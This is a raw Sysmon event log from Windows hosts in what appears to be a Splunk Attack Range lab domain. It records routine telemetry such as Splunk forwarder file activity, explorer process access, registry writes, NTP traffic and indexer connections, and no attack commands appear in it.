AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D2027C511D9051095CDBB3DBE48CED3,SHA256=5390AC695160F01B250F94347D3F61CB1EDE9DE8E3FCDB7F616EA832FF1E304B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219830Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:29.095{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56ABDB1DD60DF9562712C66D773EB2DB,SHA256=195F9EBDA46C36F23DD961B8DD4AF79D312A240AB52733C36C013AE1330EB62C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219829Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:29.048{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9AA5E157E252FD0DD6B73075B3561BC,SHA256=63F101F8583DF472F36883AE3301A52BA56FF01604F7E4DF187890792512DAFC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219833Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:30.048{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=295A4A1D0BC5171F53237D4C288C4690,SHA256=7890534607D865D26CD0CE368BF1DF6FE2D5401133F7CB56E5C40AA216DF96E3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000057346387Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.853{8B6011A9-8B2B-618D-C0DA-04000000F101}87364068C:\Windows\explorer.exe{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+17e8d|C:\Windows\System32\SHELL32.dll+61e00|C:\Windows\System32\SHELL32.dll+62967|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057346386Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.853{8B6011A9-8B2B-618D-C0DA-04000000F101}87364068C:\Windows\explorer.exe{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62967|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000057346385Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:30.853{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x800000000000000057346384Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:30.853{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 11241100x800000000000000057346383Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.853{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeC:\Users\Administrator\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat2021-09-16 13:08:16.776 23542300x800000000000000057346382Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.853{8B6011A9-8B2B-618D-C0DA-04000000F101}8736ATTACKRANGE\AdministratorC:\Windows\explorer.exeC:\Users\Administrator\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.datMD5=58FDE1A71D2ADB272DABB3A92B406559,SHA256=555933C7D5D49EBF3648EE1EF420E0C71835139B8A8DEF8FBA64C9EBE48B0C32falsetrue 10341000x800000000000000057346381Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.837{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-C6FA-616E-9C35-01000000F101}4136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6165f|C:\Windows\System32\SHELL32.dll+62400|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057346380Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.837{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-C6FA-616E-9C35-01000000F101}4136C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c00|C:\Windows\System32\SHELL32.dll+623bc|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057346379Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.837{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-C6FA-616E-9C35-01000000F101}4136C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62390|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057346378Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.837{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-C6FA-616E-9C35-01000000F101}4136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000057346377Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:01.454{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54563-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057346376Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.106{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346375Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.105{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=41302CCEC64350E0E90637E600B2B741,SHA256=234B63BB885130F9A1EBAEBEED26C3D350E4206941D658B22B544A034C00B7C4falsetrue 24542400x800000000000000057346374Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.069{8B6011A9-8897-6164-8000-00000000F101}4756C:\Windows\System32\rdpclip.exe2user: ATTACKRANGE\administrator hostname: C02DN3AYMD6PMD5=E4E8F0758DB1306608839F471EC64A73,SHA256=D47589CC1AAD18F993D7C85C9240F69B95F10BC94AE0407899676220E88338D1true 10341000x800000000000000057346373Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.069{8B6011A9-886D-6164-0C00-00000000F101}8484668C:\Windows\system32\svchost.exe{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057346372Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.069{8B6011A9-886D-6164-0C00-00000000F101}8484668C:\Windows\system32\svchost.exe{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000057346371Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.069{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeC:\Sysmon\CLIP-E4E8F0758DB1306608839F471EC64A73D47589CC1AAD18F993D7C85C9240F69B95F10BC94AE0407899676220E88338D12021-11-12 12:18:30.069 10341000x800000000000000057346370Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.069{8B6011A9-887D-6164-2700-00000000F101}28565420C:\Windows\sysmon64.exe{8B6011A9-8897-6164-8000-00000000F101}4756C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Windows\sysmon64.exe+50e63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000057346369Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.022{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346368Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:30.022{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=042167D5D5144BF75D517FC410D5F574,SHA256=275C85DE36539B9CECAB3C22010D6F512BC811E37B3B86AB62E343BCA2358355falsetrue 11241100x800000000000000057346389Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:31.037{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346388Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:31.037{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E763E6F4870C85814E1CC1B6B128F2C9,SHA256=BB0DD5B6AF3CAF917A5E19248CC221DAB731C5FAC6D489B4D670912DFB82DB38falsetrue 13241300x800000000000000021219835Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-SetValue2021-11-12 12:18:31.126{AD5E2759-5433-6143-1300-00000000F101}308C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7d7bf-0x67d2122b) 23542300x800000000000000021219834Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:31.079{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=127FD51762A8ADEAD269BEC19AEAD5EC,SHA256=EAF7C9BEB9A120BD726C09A36A6905067675CD5374C1D62FE8DB58F6271EE528,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000057346393Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:32.771{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:0000000000580094\VirtualDesktopBinary Data 12241200x800000000000000057346392Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:32.771{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:0000000000580094 11241100x800000000000000057346391Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:32.038{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346390Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:32.038{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4608E551BFA2A390847932E0CBDCA50,SHA256=421A61D476ED58DA8E62173877949CB1347D5E1B30BC6AB165430AB6DB37DD32falsetrue 354300x800000000000000021219838Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:19.532{AD5E2759-5433-6143-1300-00000000F101}308C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-874.attackrange.local123ntpfalse169.254.169.123-123ntp 23542300x800000000000000021219837Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:32.126{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D2027C511D9051095CDBB3DBE48CED3,SHA256=5390AC695160F01B250F94347D3F61CB1EDE9DE8E3FCDB7F616EA832FF1E304B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219836Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:32.095{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8EEA07F723F52ACB7778C2A6F9BFDBB,SHA256=85473C6363078E3BED0E27431CB73F697E9B1066C6868A334394A35A78DFD9F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219839Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:33.095{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D03B28559BD144CCDF4DE78C4536293,SHA256=B7216C92B7A9270CCA938ACE5087FD785638734DFCF9B3540AAF870A9C18FEE6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000057346397Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:33.856{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x800000000000000057346396Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:33.856{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkrBinary Data 11241100x800000000000000057346395Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:33.055{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346394Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:33.055{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0875516069AAFCD30157DAC008A3AB1A,SHA256=9BEC675AA3F000257460846304B0175C713BC676BBF19A49F9290E21269FECDCfalsetrue 354300x800000000000000021219842Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:21.533{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64339-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219841Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:34.142{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8096DD36CAA6D47F5DAAC27D292DD449,SHA256=9159FCCBED65C335D4E7B89E7209C97ED219BA57415B86192EF1CD7BB8D95C9D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219840Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:34.110{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5C9D02A50416772589BFBB6BEBA4636,SHA256=63A2A7D848551E3D335D5EF90D4056CDEFA88A3B3621550AB5EECCE1E264E812,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346592Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.971{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346591Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.971{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=42A7D6B552F0C920A80B9EE19EFACFBA,SHA256=24B3AF4321027EAA2D6C7F16EC9407C82F6CF77F044BFC2E755FE13B69A1FD7Cfalsetrue 11241100x800000000000000057346590Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.856{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346589Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.856{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5798E46FD34DC68C3755005DFA45093F,SHA256=288748F3B7C43A21CCCEF0E8D8D4DF54E301FD88B6484D4868B277914B4A3EF0falsetrue 11241100x800000000000000057346588Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.807{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346587Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.806{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4ADF3E09CC2F6FDB0D33FD46327B32B,SHA256=7F17479CA76AC543EE2FD18B8A14656A46251AAC6FCD48159B8D6062506446C4falsetrue 12241200x800000000000000057346586Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057346585Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057346584Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057346583Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346582Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346581Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346580Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346579Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 